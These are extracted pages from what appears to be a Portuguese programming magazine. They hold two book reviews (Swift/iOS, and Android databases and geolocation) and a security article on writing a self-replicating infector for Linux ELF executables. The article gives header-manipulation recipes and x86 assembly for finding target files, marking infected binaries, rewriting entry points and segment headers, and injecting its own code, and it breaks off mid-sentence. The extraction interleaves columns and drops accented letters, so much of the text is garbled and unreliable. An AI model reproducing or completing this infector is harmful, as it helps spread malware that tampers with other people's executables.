ne, iPad e iPod Touch Curso Completo tambm editado
pela FCA.
Ao longo de dez captulos os autores constroem uma
aplicao mobile recorrendo linguagem Swift, permitindo
de uma forma didtica a introduo programao de siste-
mas mobile IOS e sua linguagem. Para poder tirar mais
partido do processo de aprendizagem deste livro, o leitor
necessita de ter acesso a um computador da Apple e ter
instalado o XCode para poder seguir os exemplos.
No primeiro capitulo temos a introduo, dar a conhe-
cer a linguagem Swift, o IDE XCode e aps alguns conceitos
base do inicio ao projeto que vai acompanhar a leitura do
livro.
A introduo linguagem surge nos captulos dois e
trs, onde o leitor tem o primeiro contato com a linguagem e
descrito os conceitos base como os tipos de variveis, a
sua definio, aes de controlo de fluxo, funes e a intro-
duo classes e estruturas de dados. Para programadores
que j passaram por outras linguagens, notaro algumas
semelhanas na definio ou comportamento da programa-
o Swift em relao a outras linguagens, contudo de refe-
rir que so apenas semelhanas. So abordados temas mais
avanados como a programao orientada a objetos, progra-
mao concorrente ou closures.
AUTOR
Escrito por Nuno Cancelo
Curioso por natureza e engenheiro informtico por formao. Desde muito cedo me despertou o interes-
se pelos computadores e informtica com o famoso Spectrum. Tenho um gosto peculiar por aprender
novas coisas frequentemente mesmo que no venha a trabalhar com elas e optimizar os sistemas au-
mentando a sua performance.
O divertimento chega com o capitulo cinco onde se
comea a construir a aplicao e so introduzidos conceitos
fulcrais no desenvolvimento de aplicaes mobile. Neste
capitulo muitos conceitos so introduzidos esto relaciona-
dos com os diversos componentes da aplicao, como sejam
os controladores de contedos, entre outros.
A forma como os controlos e as vistas esto relacio-
nados, assim como o seu relacionamento apresentado no
capitulo 5. Este capitulo particularmente interessante pela
utilizao do Storyboard e a introduo interface grfica,
dando mote ao capitulo seguinte.
No capitulo seis, dado o foco experincia de utili-
zao, forma como so geridos os eventos de movimento,
s animaes das vistas e a incluso de recursos multimdia.
A geo-localizao e os mapas so o foco do capitulo
sete, onde explicado a melhor forma de utilizar este servi-
o.
Como utilizar recursos JSON e XML, explicado no
capitulo oito. Neste capitulo apresentado, igualmente, a
forma de integrar a redes sociais na aplicao.
Com o aproximar do final do livro, os ltimos dois
captulos so reservados os temas da persistncia (capitulo
nove) e testes da aplicao e submisso na apple store
(capitulo dez).
Concluso:
Este livro uma breve introduo linguagem Swift e
criao de aplicaes para IOS, apesar da aplicao cons-
truda ser simples, os conceitos mais importantes e os com-
ponentes mais utilizados so apresentados de uma forma
simples e de fcil aprendizagem, sendo um bom ponto de
partida para quem quiser aprender a linguagem.
40
 Review
Bases de Dados e Geolocalizao

Ttulo: Bases de Dados e Geolocaliza- a ponderar. (ORM uma tcnica que abstrai o acesso ao
o banco de dados SQLite e implementa a tcnica de mapea-
Autores: Ricardo Queirs mento objeto relacional, tornando simples a tarefa de mani-
pular dados de forma persistente). So tambm explicadas
Editora: FCA ao leitor quais as vantagens e desvantagens de cada um
Pginas: 192 destes temas. Neste capitulo o autor d-nos tambm um
pequeno projecto exemplo que permite ao leitor seguir passo
ISBN: 978-972-722-862-1 -a-passo a criao e configurao do mesmo, o que na mi-
Formato: Capa soft nha opinio uma mais-valia para os leitores menos experi-
entes. O captulo 5 encerra a parte de Base de Dados e
Nesta edio trazemos at vs a review de um dos onde abordada a Gesto Remota de Dados, pois cada vez
livros mais recentes da FCA Editora, o Android Bases de mais a nvel aplicacional necessrio aceder e manipular
Dados e Geolocalizao de Ricardo Queirs. Como seria de dados que no esto localmente no dispositivo.
esperar, este um livro com a qualidade habitual que este
autor j nos habituou. Direccionado para os profissionais de
informtica (e tambm para os entusiastas e curiosos) que
queiram dar os primeiros passos na programao Android
com destaque claro est para as bases de dados e geoloca-
Como seria de es-
lizao. Contudo devo dizer-vos que os leitores mais experi-
entes no assunto, no ficaro desiludidos com este livro em perar, este um livro
particular, uma vez que os temas abordados tm todo o inte-
resse, tenhamos 0 ou 10 anos de experincia nesta temti- com a qualidade habi-
ca.
O livro constitudo por oito captulos, sendo que os mes- tual que este autor j
mos esto divididos por duas partes. A linguagem de progra-
mao usada nos exemplos dados o Java. nos habituou. Direccio-
A primeira parte, em que os temas abordados dizem respeito
s bases de dados constituda por 5 captulos. Iniciamos
nado para os profissio-
com o captulo de Tcnicas e Persistncia de Dados em que
dada ao leitor uma pequena explicao do tema assim nais de informtica (e
como quais as aplicaes de desenvolvimento que deve ter
instaladas para obter o melhor partido do livro. Seguidamen- tambm para os entusi-
te temos como segundo capitulo, uma abordagem aos Fi-
cheiros, quer seja a leitura ou escrita dos mesmos. Para
os leitores que no esto to familiarizados com este tema,
astas e curiosos) que
achei este captulo uma mais-valia para que possam acom-
panhar o restante aprendizado j com as bases mais cimen-
queiram dar os primei-
tadas. tambm neste captulo que so abordadas as princi-
pais diferenas entre armazenamento interno e externo dos ros passos na progra-
dispositivos mveis. O terceiro captulo aborda Preferncias
Partilhadas, em que dado a conhecer ao leitor as prin- mao Android com
cipais classes que providenciam a framework geralmente
usada para armazenar os dados de configuraes da aplica-
o, ou seja as classes PreferenceActivity e PreferenceFrag-
destaque claro est pa-
ment. ra as bases de dados e
Posto isto, passamos para o quarto captulo, o das Bases de
Dados. Considero que este, na minha opinio, o captulo geolocalizao
mais importante deste livro uma vez que nos descreve algu-
mas das prticas mais importantes sobre o armazenamento
de dados. importante referir que o autor alm de abordar a
base de dados SQLite, nos leva tambm a uma abordagem Chamo a vossa ateno para este captulo uma vez
base de dados Realm, e ao Sugar ORM como alternativas que o livro descreve como aceder remotamente aos dados,

41
 Review

mas tambm como instalar e configurar o WAMP do lado do
servidor e como podemos usar isso para criar uma maior
interaco entre o utilizador final e a aplicao criada. Neste
captulo, o backup de dados no foi esquecido e este tema
tambm abordado.
telemvel connosco. Assim, nas pginas deste captulo o
leitor levado a compreender como pode tirar um maior par-
tido da aplicao e da experincia que a aplicao proporcio-
na ao utilizador final.

Contudo devo di-

zer-vos que os leitores
mais experientes no
assunto, no ficaro
desiludidos com este
livro em particular, uma
vez que os temas abor-
dados tm todo o inte-
resse, tenhamos 0 ou
10 anos de experincia
nesta temtica.

No sexto captulo, entramos na segunda parte desta

obra e passamos Geolocalizao, assim, este captulo
Em suma, e sendo esta uma opinio prpria, conside-
comea por apresentar o Google Play Services (uma biblio-
ro que este um livro que poder ser uma mais-valia na
teca de servios para dispositivos Android), alm da apre-
biblioteca pessoal, pois o facto de encadear os ensinamen-
sentao, o leitor guiado atravs de algumas das boas
tos de uma forma simples e intuitiva, leva a que possamos
prticas da configurao desta biblioteca.
acompanhar todo o processo de desenvolvimento de forma
O captulo 7 dedicado aos Mapas. Devo dizer-vos mais fcil e natural, sendo um livro que pode ser lido como
que neste captulo os leitores mais inexperientes no vo um todo, ou como consulta nalgum destes temas em particu-
sentir-se deslocados pois o autor torna todo o conceito lar.
simples. Desde os tipos de mapas disponveis, sua confi-
gurao e controlo, tudo isto abordado neste livro. Por lti-
mo, chegamos ao oitavo captulo, dedicado Localizao.
Creio que este tema seja tambm um dos mais importantes
pois no mundo de hoje, todos andamos constantemente com

AUTOR
Escrito por Rita Peres

Natural de Castelo Branco, licenciou-se em Engenharia Informtica pela Universidade da Beira Interior.
Membro do P@P desde Janeiro de 2010. Embaixadora das Geek Girls Portugal Ncleo de Lisboa.

42
Segurana
Como criar um programa auto-replicativo em assembly, para GNU/Linux
 Segurana
Como criar um programa auto-replicativo em assembly, para GNU/Linux
A arte da criao de programas auto-replicativos parece
estar perdida no tempo. No podemos confundir um programa
auto-replicativo com malware, cavalos de tria, worms, etc. Um
programa auto-replicativo no executa nenhum tipo de cdigo
para danificar hardware ou software, pelo contrrio apenas
tenta replicar-se de diversas formas ou mtodos e por norma
escrito numa linguagem de baixo nvel, como por exemplo as-
sembly. A parte mais interessante e importante do programa ao
contrrio de um malware no um pedao de cdigo para cau-
sar danos, mas antes pelo contrrio apenas o cdigo que per-
mite que o programa se replique.
Apesar de muitas vezes se confundirem as duas tare-
fas, um programa auto-replicativo uma forma de criatividade,
engenho e inovao, com o objectivo de criar um programa
que se consiga manter num sistema informtico evitando ser
apagado e replicando-se de forma inteligente, evitando a sua
deteco e consequente remoo. quase como fazer um
avio de papel, ajustar as asas, o nariz, colocar ou no um
leme de cauda, etc e atirar para ver que distncia percorrida
antes de inevitavelmente aterrar, ou melhor, cair! Em momento
algum se pretente que o programa, tal como o avio, dure ad
aeternum, sendo o interesse apenas no lapso de tempo que
ele durar at ser totalmente removido.
O objectivo deste artigo apenas apresentar a temtica
e um programa exemplo, para que o leitor possa experimentar
e comear a entender os mecanismos envolvidos, construindo
o programa e aprofundando assim conhecimentos de sistema
operativo e programao na lingagem assembly.
No incrvel livro de Ryan "elfmaster" O'Neill, Learning
Linux Binary Analysis, ele afirma: ... um grande desafio de
engenharia que excede as convenes regulares de programa-
o, exigindo que o programador pense fora dos paradigmas
convencionais. manipular o cdigo, dados e ambiente para
ele se comportar de uma determinada forma... (). Enquanto
conversando com os desenvolvedores do software AV, fiquei
espantado que, ao lado de nenhum deles tinha qualquer idia
real de como engenheiro de um vrus, muito menos projetar
qualquer heurstica real para identific-los (diferente de assina-
turas). A verdade que a escrita do vrus difcil, e requer
habilidade sria.
A escrita deste tipo de programas em linguagem As-
sembly ou em linguagem C de certa forma uma arte em se-
parado. As linguagens como assembly ou C sem o recurso a
bibliotecas, so basicamente pinceis, simples prontos para
pintar.
Antes de passarmos ao programa propriamente dito,
vejamos alguns aspectos importantes relacionados com esta
temtica.
Existem diversos tipos de ficheiros executveis, para
diversos sistemas operativos, sejam eles baseados em Unix,
sejam sistemas desenvolvidos pela Microsoft, sejam outros
sistemas. Conforme o sistema onde vamos querer que o
nosso programa auto-replicativo sobreviva, teremos de
conhecer minimamente o tipo de ficheiros executveis do
sistema, alm do prprio sistema. Foquemo-nos nos tipos de
ficheiros.
Os tipos de ficheiros:
Neste caso como apenas vamos permitir a replica-
o para binrios executveis, vamos ver os diferentes tipos
de ficherios binrios executveis existentes, para os vrios
sistemas:
ELF - (Formato de arquivo executvel e vinculvel
(linkable)) formato de ficheiro binrio padro para
sistemas Unix e sistemas semelhantes ao Unix. Tam-
bm usado por muitos equipamentos mveis, con-
solas de jogos (Playstation, Nintendo), equipamentos
de internet das coisas, equipamentos de rede, etc.
Mach-O - (objecto mach) ficheiro binrio execut-
vel usado em sistemas com ncleo Mach, inicialmen-
te desenvolvido pela Universidade de Carnegie Mel-
lon, utilizado em sistemas como por exemplo o ma-
cOS, iOS, NextStep.
PE - (executvel porttil) usado nos sistemas ope-
rativos Microsoft de 32-bit e 64-bit, tanto em ficheiros
executveis como nos ficheiros FON Font Files, utili-
zado desde o sistema operativo Windows NT 3.1.
MZ (DOS) - Formato de arquivo executvel siste-
ma operativo DOS, suportado por todos os sistemas
operativos de 32 bits da Microsoft e anteriores, foi o
formato usado nos ficheiros .exe do MS.DOS. Estes
ficheiros tm uma particularidade engraada, que
permite a sua identificao, quando abertos num edi-
tor de hexadecimal. No incio do nmero mgi-
co (magic number), encontram-se os valores 0x4D
0x5A que convertidos em ASCII resultam em MZ, as
iniciais de um dos programadores do MS-DOS Mark
Zbikowski.
COM (DOS) - suportado por todos os sistemas
operacionais da Microsoft de 32 bits e anteriores.
um formato extremamente simples, no contm cabe-
alho (header), no contm metadados padro, tem
um tamanho mximo de 65.280bytes e armazena
todo o cdigo num nico segmento de dados.
Cada tipo de ficheiro corresponde a um ou mais siste-
mas operativos, tem a sua prpria histria e curiosidades,
bem como formato. Acima pudmos ver os principais tipos
de ficheiros, mas por ser complexo abordar todos, irei ape-
nas focar o sistema operativo GNU/Linux e o formato ELF.
44
 Segurana

COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX

As funcionalidades do programa exemplo os ficheiros ELF comeam sempre por 7f45 4c46,
em que 45-4c-46 correspondem representao hexadeci-
O programa ter de se replicar, embutindo-se em fichei- mal dos caracteres ELF. Por exemplo um executvel do Win-
ros executveis dows comea por 4D5A, que corresponde representao
hexadecimal dos caracteres M-Z e por exemplo um exetuc-
O programa deve ser auto-contido, ou seja capaz de
vel do OS X, nos marcadores os bytes so CEFA EDFE.
operar independentemente de outros ficheiros ou pro-
gramas Neste caso e estando a analisar um exemplo para
GNU/Linux, ser colocado um marker nos bytes no utiliza-
Os ficheiros hospedeiros devem continuar a execuo dos, situados entre 9 e 12 do header do ficheiro ELF, apenas
do programa, permitindo a sua replicao para facilitar a deteco, no caso ser o valor dword
O programa ir agir como um cogumelo, um parasita 61706f63. Isto apenas ser necessrio para assinalar
que no danifica nem altera o comportamento do seu ficheiros que j foram infectados, evitando assim a re-
hospedeiro, mas depende dele para se manter vivo. infeco de ficheiros, que faria disparar o tamanho de cada
ficheiro num efeito cclico, o que levaria a que as unidades
A primeira tarefa ser procurar todos os ficheiros dispon- de armazenamento fossem cheias at no haver mais espa-
veis na filesystem num determinado directrio. Existem diver- o. De igual forma facilita a deteco e eliminao, at por-
sas formas de o fazer, de qualquer das formas a mais simples que se est a falar de um exemplo para estudo, logo convm
seria a que se segue: ter controlo sobre o mesmo. Lendo os primeiros 12 bytes
possivel determinar se um ficheiro passvel de ser infecta-
find_filename_start: do ou no e em caso negativo, passar para o ficheiro seguin-
; procura a sequncia 0008 que ocorre antes do te. Neste caso e apenas por questes de desempenho, os
;nome do incio do nome de um ficheiro
add edi, 1 ficheiros passveis de serem infectados, sero armazena-
cmp edi, len dos temporariamente num buffer separado, chamado alvos.
jge done
cmp byte [buffer+edi], 0x00 De forma extremamente resumida, os ficheiros ELF
jnz find_filename_start so compostos pelo cabealho elf (elf header), os cabea-
add edi, 1
cmp byte [buffer+edi], 0x08 lhos de programa (program headers), os cabealhos de sec-
jnz find_filename_start o (section headers) e as instrues op code. Os cabea-
lhos ELF fornecem a informao relativa aos cabealhos de
xor ecx, ecx ; limpa ecx que ser utilizado
;como offset para o ficheiro programa, bem como aos cabealhos de seco, o local da
find_filename_end: memria onde estar armazenado o primeiro op code. Por
; procura a sequncia 00 que indica o fim de um outro lado, os cabealhos de programa indicam que segmen-
; nome de ficheiro tos pertencem ao segmento de texto e quais pertencem ao
add edi, 1
cmp edi, len segmento de dados, bem como os offsets do ficheiro. Por
jge done sua vez os cabealhos de seco do-nos informao sobre
cada seco e que segmentos pertencem a quem. Isto
mov bl, [buffer+edi] ; copia um byte do
; buffer para o ficheiro parece confuso, e na verdade no assim to linear, apenas
mov [file+ecx], bl foi extremamente resumido.
inc ecx ; incrementa o offset
; armazenado em ecx Um ficheiro executvel encontra-se em estados dife-
rentes, quando est a ser executado e quando est armaze-
cmp byte [buffer+edi], 0x00 ; denota o fim do nado na unidade de armazenamento, seja ela um disco rgi-
; nome do ficheiro
jnz find_filename_end do, uma flash-drive, ou outra. Os cabealhos disponibilizam
mov byte [file+ecx], 0x00 ; adiciona 0x00 ao a informao acerca do estado actual de um dado ficheiro,
; final do buffer de ficheiro conforme o estado em que ele se encontre num dado mo-
;; aqui sero includas outras instrucoes mento. O TEXT o segmento de leitura e execuo que
contm o nosso cdigo e outros dados s de leitura. O Data
jmp find_filename_start ; desloca-se para o segmento de leitura e escrita que contm as variveis
; find_filename_start e inicia nova busca
globais e a informao destinada ligao dinmica
(dynamic linking). No segmento TEXT encontra-se uma sec-
O prximo passo ser analisar o ficheiro e descobrir o .text, e umda seco .rodata. No segmento DATA en-
duas coisas: contram-se as seces .data e .rodata. Dentro do segmento
um ficheiro executvel ELF? data, existem ainda mais duas seces a .data e a .bss .
Para os que esto mais familiarizados com a linguagem de
J est infectado?
programao assembler, estes nomes dever ser algo familia-
Existem vrios tipos de ficheiros executveis diferentes, res.
utilizados plos diferentes sistemas operativos. Cada tipo de
ficheiro tem diferentes marcadores nos seus headers, por Contrariamente ao formato PE dos ficheiros do Micro-

45
 Segurana

COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX

soft Windows, no existem muitas reas para serem
infectadas, pelo que a tarefa um pouco mais complexa! O
formato ELF no permite escrita no segmento TEXT, o que ir
dificultar um pouco, mas ser possivel na realizar o efeito pre-
tendido recorrendo a algum engenho, como veremos em segui-
da.
seguintes:
Adicionar o tamanho do vrus (arredondado para o
valor alinhado da pgina seguinte) ao deslocamento
para a tabela do cabealho da seo (no cabealho
ELF)

As principais estratgias para infectar ficheiros no for-
mato ELF so as seguintes:
Infeco por Preenchimento de Text (Text Padding Infecti-
on)
Infectar o final da seo .text: Podemos tirar proveito do
facto de que os arquivos ELF, quando carregados na memria,
envolvem os segmentos por uma pgina inteira de 0's. Esta-
mos limitados por restries de tamanho de pgina, portanto,
podemos apenas ajustar um vrus de 4kB num sistema de 32
bits ou um vrus de 2MB num sistema de 64 bits. Isso pode ser
pequeno, mas no entanto suficiente para um pequeno vrus
escrito em C ou Assemby. Para conseguir tal os procedimentos
so os seguintes:
Alterar o ponto de entrada (no cabealho ELF) para o
fim da seo de texto
Adicionar o tamanho da pgina ao deslocamento para a
tabela de cabealho de seo (no cabealho ELF)
Aumentar o tamanho do arquivo e o tamanho da mem-
ria do segmento de texto pelo tamanho do cdigo do
vrus
No cabealho do programa de segmento de texto,
diminuir o endereo virtual (o endereo fsico) pelo
tamanho do vrus (arredondado para o prximo valor
de pgina alinhada)
No cabealho do programa de segmento de texto,
aumentar o tamanho do arquivo e o tamanho da me-
mria pelo tamanho do vrus (arredondado para o
valor alinhado da pgina seguinte)
Para cada cabealho de programa com um desloca-
mento maior do que o segmento de texto, aument-lo
pelo tamanho do vrus (arredondado novamente)
Alterar o ponto de entrada (no cabealho ELF) para o
endereo virtual do segmento de texto original - o
tamanho do vrus (arredondado)
Aumentar o deslocamento do cabealho do programa
(no cabealho ELF) pelo tamanho do vrus
(arredondado)
Inserir o vrus real no incio da seo de texto

Para cada cabealho de programa que reside aps o
vrus, aumentar o deslocamento pelo tamanho da pgi-
na
Localizar o ltimo cabealho da seo no segmento
TEXT e aumentar o tamanho da seo (no cabealho
da seo)
Para cada cabealho de seo que existir aps o vrus,
aumentar o deslocamento pelo tamanho da pgina
Inserir o vrus real no final da seo de texto
Inserir o cdigo que salta para o ponto de entrada do
host original
Infeco do segmento de dados (Data Segment Infecti-
on)
Infecta o segmento de dados. Anexa-se o cdigo do
vrus ao final do segmento de dados (antes da seco .bss).
Como a seo de dados, nosso vrus pode ser to grande
quanto quisermos, sem restries. O segmento de memria
DATA tem um conjunto de permisses R + W (leitura e gra-
vao) enquanto o segmento de memria TEXT possui um
conjunto de permisses R + X (leitura e execuo). Em siste-
mas que no possuem um conjunto de bits NX (como siste-
mas GNU/Linux de 32 bits), pode-se executar o cdigo no
segmento DATA sem alterar o conjunto de permisses. No
entanto, outros sistemas exigem que se adicione uma flag
executvel para o segmento onde o vrus reside.

Aumentar o deslocamento do cabealho da seo (no

Infeco reversa do texto (Reverse Text Infection)
Infectar a frente da seo .text permitindo que o cdigo
do host mantenha o mesmo endereo virtual. Estende-se o
segmento de texto em sentido inverso. O menor endereo de
mapeamento virtual permitido nos sistemas Linux modernos
0x1000, que o limite de quanto podemos ampliar para trs o
segmento de texto. Num sistema de 64 bits, tamanho padro
do endereo virtual geralmente 0x400000, o que deixa espa-
o para um vrus de 0x3ff000 menos o tamanho do cabealho
ELF. Num sistema de 32 bits, o endereo virtual de texto pa-
dro normalmente 0x0804800, o que deixa espao para um
vrus ainda maior. Para conseguir tal os procedimentos so os
cabealho ELF) pelo tamanho do vrus
Alterar o ponto de entrada (no cabealho ELF) at o
final do segmento de dados (endereo virtual + tama-
nho do arquivo)
No cabealho do programa do segmento de dados,
aumentar a pgina e o tamanho da memria pelo
tamanho do vrus
Aumentar o deslocamento de bss (no cabealho da
seo) pelo tamanho do vrus

46

COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX
Definir o bit de permisso executvel no segmento DA-
TA. (No aplicvel para sistemas Linux de 32 bits)
Inserir o vrus real no final da seo de dados
Insirir o cdigo que salta para o ponto de entrada do
host original
Existem muitos outros mtodos, no entanto como neste
artigo apenas se pretende apresentar a temtica dos progra-
mas auto-replicativos, apenas so apresentadas os trs mto-
dos acima, dos quais apenas ir ser aprofundado o terceiro.
Uma outra dificuldade quando se pretende criar um pro-
grama auto-replicativo, so as variveis, uma vez que no se
podem combinar as seces .data e .bss do programa auto-
replicativo e do seu hospedeiro. Alm disso, uma vez compila-
do o programa auto-replicativo, no h qualquer garantia de
que a localizao das suas variveis venha a residir no mesmo
endereo virtual quando o programa for executado a partir do
executvel hospedeiro. Assim para evitar este tipo de ocorrn-
cia, limita-se o programa auto-replicativo a uma nica seco
a .text. Isto algo complexo e desafiante, mas um bom desa-
fio, diz o povo na sua sabedoria, agua a mente!
Vejamos algumas ideias e tcnicas que podem facilitar
a tarefa:
Primeiramente inicializamos das variveis que se en-
contram na seco .data, definindo os seus valores, se possi-
vel no prprio cdigo, como no exemplo que se segue:
section .data
folder db ".", 0
len equ 2048
filenamelen equ 32
elfheader dd 0x464c457f ; 0x7f454c46 -> .ELF (
signature dd 0x001edd0e ; 0x61706f63
section .bss
filename: resb filenamelen ; armazena o
; caminho para o ficheiro de ;destino
buffer: resb len ; armazena o nome de todos os
; ficheiros
alvos: resb len ; Armazena o nome dos ficheiros
; de destino
targetfile: resb len ; armazena o contedo dos
; ficheiros de destino
section .text
global v1_start
v1_start:
call signature
dd 0x001edd0e ; 0x61706f63
signature:
pop ecx
Aproveitamos o facto de que quando uma instruo de
chamada (call) feita, o valor absoluto da instruo actual
empurrado (push) para a pilha (stack) para uma chamada de
retorno (ret). Na prtica podemos fazer isso para cada uma das
variveis da seco .data e ultrapassar a seco completamen-
te, etivanto assim mais dificuldades, relacionadas com vari-
veis. Quanto s variveis da seo .bss (no inicializadas),
precisamos de reservar um nmero definido de bytes para
elas. Uma vez que isto no pode ser feito na seco .text por-
Segurana
que isso faz parte do segmento de texto que marcado co-
mo r + x (somente leitura e execuo), nenhuma escrita
permitida nesse segmento de memria. Ento usamos a
pilha (stack). Assim, uma vez que inserimos bytes na pilha,
podemos observar o apontador da pilha e armazenar esse
marcador para uso futuro.
Segue-se um exemplo de como o fazer:
; Criar espao na pilha para as variveis no
inicializadas para evitar a seco .bss
mov ecx, 2328 ; coloca o contador a 2328 bytes
; (x4 = 9312 bytes). Nome do ficheiro (esp),
; buffer (esp+32), alvos (esp+1056), targetfile
; (esp+2080)
loop_bss:
push 0x00 ; reserva 4 bytes (double
; word) de 0's
sub ecx, 1 ; decrementa o contador em 1
cmp ecx, 0
jbe loop_bss
mov edi, esp ; esp contem o offset .bss
; falso offset, armazenado no edi.
Observe-se o facto de se ter empurrado 0x00 bytes,
usando o push, carrega-se uma double word de cada vez,
o que em assembly de 32 bits, at prefazer o tamanho ne-
cessrio. Isso d-nos um espao de cerca de 9312 bytes
para utilizar. Feito isto armazena-se o valor de ESP (o apon-
tador de pilha) e usa-se isso como base para o ".bss falso".
Posteriormente pode-se aceder fazer referncia ao ESP +
[offset] para aceder a diferentes variveis. Neste caso, foi
reservado o [esp] para o nome do ficheiro, o [esp + 32] para
o buffer, [esp + 1056] para alvos e [esp + 2080] para o arqui-
vo de destino.
Agora pode-se eliminar completamente as sec-
es .data e .bss e ficar com o programa auto-replicativo por
inteiro na seco .text .
Agora ser preciso ler os bytes do arquivo hospedeiro
(host) para um buffer, fazer as alteraes necessrias para
os cabealhos e injetar o marcador de programa auto-
replicativo, para tal ser lido o ficheiro byte a byte at que a
chamada de leitura do sistema devolva o valor 0x00 no EAX,
o que indica que foi atingido o EOF (fim de ficheiro), como
podemos ver no cdigo seguinte:
reading_loop:
mov eax, 3 ; sys_read
mov edx, 1 ; l 1 byte de cada vez
int 80h
cmp eax, 0; se for 0, atingiu o EOF
je reading_eof
mov eax, edi
add eax, 9312; 2080 + 7232 (2080 o offset
; do ficheiroAlvo no .bss falso)
cmp ecx, eax ; se o ficheiro tiver mais que
; 7232 bytes, sai
jge infect
add ecx, 1
jmp reading_loop
reading_eof:
push ecx ; armazena o endereo do ultimo
; byte lido
47
 Segurana
COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX
mov eax, 6 ; fecha o ficheiro
int 80h
Fazer alteraes no buffer bastante mais simples,
apenas necessrio ter presente que se ter de lidar com a
ordem de bytes invertida (extremidade pequena) sempre que
se mova qualquer coisa maior que um nico byte.
Agora ser injetado o marcador do programa auto-
replicativo e mudado o ponto de entrada para apontar para o
programa auto-replicativo, no final do segmento de dados. (O
tamanho do arquivo no inclui o espao que o .bss ocupa na
memria).
Vejamos o cdigo:
mov ebx, dword [edi+2080+eax+8]; phdr->vaddr
; Endereo virtual em memria
add ebx, edx ; novo ponto de entrada = phdr[data]
; ->vaddr + p[data]->filesz
mov ecx, 0x001edd0e ;insere a assinatura no byte 8
; (seco no utilizada do cabealho ELF)
mov [edi+2080+8], ecx
mov [edi+2080+24], ebx ; re-escreve o ponto de
; entrada anterior com o auto-replicativo no buffer
Note-se que usada a aritmtica de deslocamento para
encontrar o caminho para a rea na parte inferior da pilha, que
foi reservada para as variveis no inicializadas.
Agora preciso localizar o cabealho de program DATA
e fazer alteraes. O truque localizar os tipos PT_LOAD e de
seguida, determinar se o deslocamento no 0x00. Se o des-
locamento for 0, um cabealho TEXT do programa, caso con-
trrio DATA.
program_header_loop:
; faz loop por todos os cabealhos de programa
; e localiza o segmento DATA PT_LOAD, offset>0)
;0 p_type, tipo de segmento
;+4 p_offset, offset no ficheiro onde comear o
; segmento
;+8 p_vaddr O endereo de memria virtual
;+c p_addr endereo fisico
;+10 p_filesz size of datas read from offset
;+14 p_memsz stamanho do segmento em memria
;+18 p_flags flags do segmento (rwx perms)
;+1c p_align alignement
add ax, word [edi+2080+42]
cmp ecx, 0
jbe infect ; no conseguiu encontrar o segmento
; de dados. Fecha-se e procura-se o prximo alvo
sub ecx, 1 ; decrementa o countador em 1
mov ebx, dword [edi+2080+eax] ; phdr->type
; (tipo de segmento)
cmp ebx, 0x01 ; 0: PT_NULL, 1: PT_LOAD, ...
jne program_header_loop ; no PT_LOAD.
; Procura o prximo cabealho (header)
mov ebx, dword [edi+2080+eax+4] ; phdr->offset
; (deslocamento do cabealho de programa)
cmp ebx, 0x00 ; se for 0, o segmento
; seguinte. Caso contrrio, encontramos o
; segmento de dados
je program_header_loop ; o prximo segmento,
; o text. Procuramos a seco de dados.
mov ebx, dword [edi+2080+24] ; ponto de entrada
; anterior
48
push ebx ; guarda o ponto de entrada anterior
mov ebx, dword [edi+2080+eax+4] ; phdr->
; offset (offset do cabealho de programa)
mov edx, dword [edi+2080+eax+16] ; phdr->
; filesz (tamanho do segmento do disco)
add ebx, edx ; offset onde o programa
; auto-replicativo deve rezidir = phdr[data]
; ->offset + p[data]->filesz
push ebx ; salva o cabealho do offset do
; programa auto-replicativo.
mov ebx, dword [edi+2080+eax+8] ; phdr->vaddr
; (Endereo virtual em memria)
add ebx, edx ; novo ponto de entrada =
; phdr[data]->vaddr + p[data]->filesz
Ser tambm preciso fazer modificaes no cabea-
lho da seco .bss. Podemos verificar se o cabealho da
seco .bss analizando o tipo de flag verificando se NO-
BITS. Os cabealhos de seco no precisam necessaria-
mente de estar presentes para que o executvel seja execu-
tado, portanto, se no o podemos localizar, no problem-
tico, pelo que podemos prosseguir:
section_header_loop:
add ax, word [edi+2080+46]
cmp ecx, 0
jbe finish_infection
sub ecx, 1
mov ebx, dword [edi+2080+eax+4]
cmp ebx, 0x00000008
jne section_header_loop
mov ebx, dword [edi+2080+eax+12]
add ebx, v_stop - v_start
add ebx, 7
mov [edi+2080+eax+12], ebx
mov edx, dword [edi+2080+eax+16]
add edx, v_stop - v_start
add edx, 7
mov [edi+2080+eax+16], edx
Feito isto, procede-se a fazer a modificao final no
cabealho ELF alterando o deslocamento do cabealho da
seco, pois ser infectando o final do segmento de dados
(logo antes do .bss) e os cabealhos do programa permane-
cem no mesmo local:
mov eax, v_stop - v_start
add eax, 7
mov ebx, dword [edi+2080+32]
add eax, ebx
mov [edi+2080+32], eax
O passo final ser injetar o cdigo do programa auto-
replicativo e finaliz-lo com as instrues JMP de volta ao
ponto de entrada original do cdigo do ficheiro hospedeiro,
para que o utilizador veja o hospedeiro a ser executado nor-
malmente.
Alguns pormenores inquietantes nesta etapa sero
por exemplo, a forma como o programa auto-replicativo cap-
tura o seu prprio cdigo ou como ser que o auto-replicativo
determina o seu prprio tamanho. Estes e outros pormeno-
res inquietantes so abordados de seguida. Em primeiro

COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX
lugar, o uso de rtulos para marcar o incio e o fim do programa
auto-replicativo e usar clculos de compensao simples:
section .text
global v_start
v_start:
;inicio do corpo do programa
; autoreplicativo
v_stop:
; fim do corpo do programa
; autoreplicativo
mov eax, 1 ; sys_exit
mov ebx, 0
int 80h
Ao fazer isso, usamos o v_start como o deslocamento
para o incio do vrus e usamos v_stop - v_start como o nmero
de bytes.
mov eax, 4
mov ecx, v_start ; attach the virus portion
mov edx, v_stop - v_start ; size of virus bytes
int 80h
Para calcular o tamanho do programa auto-replicativo
utilizamos o clculo, (v_stop - v_start), no entanto a referncia
para o incio do programa auto-replicativo (mov ecx, v_start)
falhar aps a primeira infeco. De fato, qualquer referncia a
um endereo absoluto falhar porque a localizao na mem-
ria mudar de host para host! Os endereos absolutos de rtu-
los, como o v_start, so calculados em tempo de compilao,
dependendo de como ele est sendo chamado. Os seus jmp
normal, jne, jnz, etc. sero convertidos em offsets em relao
sua posio atual, mas o endereo MOV do rtulo no ser. O pop
que precisamos uma compensao delta. Um delta offset a
diferena nos endereos virtuais do vrus original para o arqui-
vo host atual. Ento, como obtemos o deslocamento delta? Na
verdade, um truque muito simples que o Phunky Virus Guide
